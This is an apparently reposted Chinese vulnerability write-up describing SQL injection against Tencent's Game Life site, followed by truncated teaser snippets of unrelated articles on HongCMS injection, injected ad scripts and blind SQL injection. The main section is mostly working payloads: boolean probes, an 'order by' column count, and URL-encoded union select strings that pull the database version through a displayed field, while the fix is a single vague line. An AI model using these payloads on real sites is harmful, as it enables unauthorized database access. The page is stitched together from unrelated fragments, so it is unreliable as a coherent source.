騰訊遊戲人生注入漏洞(附分析及繞過方式)

2021-12-30 03:52:07 字數 487 閱讀 8276

and 1=1正常 

and 1=2

order by 13的時候正常了說明13個字段,繼續union,但是發現and 1=1的時候完全正常

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13

and 1=2的時候失敗鳥,為神馬捏,初步分析是裡面含有隱含的邏輯,注射成功但是由於業務邏輯無法在前台顯示,可以這麼試試

and 1=2 union select 987,987,987,987,987,987,987,987,987,987,987,987,987

這下成功了,然後再看看哪個欄位是要被邏輯用到的吧

%20and%201=2%20union%20select%201,1,1,987,1,1,version%28%29,987,987,987,987,987,1

這樣就可以了嘛,用這個字段顯示就可以

修復方案:

通常的防注入

SQL注入漏洞分析

一 背景介紹 hongcms是乙個輕量級的中英文企業 系統,訪問速度極快,使用簡單,程式 簡潔嚴謹,功能強大,完全免費開源,可用於建設各種型別的中英文 同時它是乙個小型開發框架。二 漏洞描述 程式在後台進行清空資料庫操作時對傳入的資料庫名過濾不嚴格,可插入和執行惡意sql語句。三 影響版本 hong...

一次指令碼注入廣告漏洞分析

如果 突然彈出乙個廣告 不是自己主動新增的聯盟廣告 第一直覺是dns劫持,在此之前也是唯一直覺。之前遇到過幾次dns劫持,wap站彈出廣告,路由器被劫持彈出廣告。未經歷其它安全事件之前,我也只是偶爾關注一下安全事件,上一次重大修復還是去年,這一次問題也比較嚴重,可以說是很嚴重。年前快放假了,有同事反...

web安全原理分析 SQL注入漏洞全解

靶場 榆林學院資訊保安協會 入侵榆大實驗靶場 mysql bool注入是盲注的一種。與報錯注入不同,bool注入沒有任何報錯資訊輸出,頁面返回只有正常和不正常兩種狀態。攻擊者只能通過這兩個狀態來判斷輸入的sql注入語句是否正確,從而判斷資料庫中儲存了那些資訊 ascii 返回字串str的最左面字元的...